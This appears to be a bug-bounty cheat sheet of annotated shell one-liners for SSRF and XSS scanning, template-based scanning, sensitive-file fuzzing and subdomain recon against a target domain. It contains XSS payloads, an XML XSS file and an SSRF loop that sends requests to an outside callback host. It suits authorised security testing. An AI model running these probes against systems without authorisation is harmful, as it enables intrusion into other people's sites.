— Replace HOST with your target top-level domain

  1. SSRF Automation

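# Crawl parameterised URLs for HOST with ParamSpider, substitute the
# out-of-band callback URL for every parameter value, then request each
# resulting URL once. A hit shows up as an interaction on the callback host,
# not in curl's output.
# NOTE(review): the callback hostname below is the sample value from the
# original write-up. Use an interaction host you control; otherwise callbacks
# (and the URLs that triggered them) land on someone else's listener.
# NOTE(review): --insecure turns off TLS certificate verification, so the
# responses are not authenticated.
python3 paramspider.py -d HOST \
  --placeholder 'http://jf2lko48ltlfmgmngl2cnyay5pbfz4.burpcollaborator.net' |
  while IFS= read -r host; do
    # Only http(s) URLs reach curl; banner or option-looking lines are skipped.
    case "$host" in
      http://* | https://*) ;;
      *) continue ;;
    esac
    curl --silent --path-as-is --insecure "$host"
  done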

  1. XSS Automation

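# Crawl parameterised URLs for HOST with ParamSpider (--subs false), put a
# script-tag marker in every parameter value, keep the URL list in
# ourpass.txt, and flag each URL whose response echoes the marker unencoded.
# NOTE(review): an unencoded echo is only a reflection signal. Whether it is
# exploitable depends on the response Content-Type, the HTML context and any
# CSP, so read "Vulnerable" as "needs manual confirmation".
# NOTE(review): --insecure turns off TLS certificate verification.
python3 paramspider.py -d HOST --subs false \
  --placeholder '"/><script>confirm(1)</script>' |
  # tee rather than '>': a plain redirect would leave the pipe below empty.
  tee ourpass.txt |
  while IFS= read -r host; do
    # Only http(s) URLs reach curl; banner or option-looking lines are skipped.
    case "$host" in
      http://* | https://*) ;;
      *) continue ;;
    esac
    # -F: match the marker as a fixed string, not as a regular expression.
    if curl --silent --path-as-is --insecure "$host" |
      grep -qsF '<script>confirm(1)'; then
      printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    else
      printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"
    fi
  done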

  1. XSS Automation

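# Collect archived URLs for HOST (saved to HOST.txt), replace every query
# string value with a script-tag marker (saved to combinedfuzz.json, which
# holds plain URLs, one per line, despite the extension), then flag each URL
# whose response echoes the marker unencoded.
# NOTE(review): the URL list comes from third-party archive data, so it is
# untrusted input to the loop below.
# NOTE(review): an unencoded echo is only a reflection signal. Whether it is
# exploitable depends on the response Content-Type, the HTML context and any
# CSP, so read "Vulnerable" as "needs manual confirmation".
# NOTE(review): --insecure turns off TLS certificate verification.
waybackurls HOST | tee HOST.txt |
  qsreplace '"><script>confirm(1)</script>' |
  tee combinedfuzz.json &&
  while IFS= read -r host; do
    # Only http(s) URLs reach curl; option-looking lines are skipped.
    case "$host" in
      http://* | https://*) ;;
      *) continue ;;
    esac
    # -F: match the marker as a fixed string, not as a regular expression.
    if curl --silent --path-as-is --insecure "$host" |
      grep -qsF '<script>confirm(1)'; then
      printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    else
      printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"
    fi
  done < combinedfuzz.json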

  1. Katana to Nuclei

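# Three stages chained with &&: probe the hosts in subdomains.txt with httpx,
# crawl the live ones with katana, then run nuclei templates over the
# crawled endpoints. A failed stage stops the chain.
# NOTE(review): '>>' appends, so alive.txt and endpoints.txt keep entries from
# earlier runs, and those stale hosts are crawled and scanned again. Clear
# the files first if that is not intended.
# NOTE(review): replace <YOUR_TEMPLATES> with a template path, and read
# third-party templates before running them: each template decides which
# requests are sent.
httpx -silent < subdomains.txt >> alive.txt &&
  katana -silent < alive.txt >> endpoints.txt &&
  nuclei -t '<YOUR_TEMPLATES>' < endpoints.txt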

  1. XML to XSS

xss.xml: <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html="http://w3.org/1999/xhtml"> <html:script>prompt(document.domain);</html:script> </html>

  1. FFUF to find valid sensitive files (check the GitHub repo mentioned for the wordlist)

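# Request every WORDLIST entry as a path under HOST and report those that
# answer with HTTP 200, descending into discovered directories.
# ffuf substitutes each entry at the FUZZ keyword, and -recursion requires
# the URL to end in FUZZ; a bare HOST has no injection point.
# NOTE(review): assumes HOST is a bare domain served over HTTPS. Adjust the
# scheme if not.
# NOTE(review): -mc 200 shows only 200 responses. Sites that return 200 for
# missing pages produce false positives, and files answering 401/403 are not
# listed.
ffuf -u 'https://HOST/FUZZ' -w WORDLIST -recursion -mc 200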

  1. Finding juicy Subdomains

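# Enumerate subdomains of HOST from all subfinder sources, keep the first
# space-separated field of dnsprobe's output, and highlight names containing
# a keyword that hints at internal, staging or admin systems.
# -E with plain '|' alternation: the doubled backslashes in the original
# pattern made grep look for literal backslash and pipe characters.
# NOTE(review): the keywords are unanchored substrings ('pre', 'dev' and
# 'test' also match inside unrelated words), so expect noise.
# NOTE(review): dnsprobe appears to have been superseded upstream by dnsx.
# Confirm which resolver you have installed.
subfinder -d HOST -all |
  dnsprobe -silent |
  cut -d ' ' -f1 |
  grep --color -E 'dmz|api|staging|env|v1|stag|prod|dev|stg|test|demo|pre|admin|beta|vpn|cdn|coll|sandbox|qa|intra|extra|s3|external|back'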

  1. Recon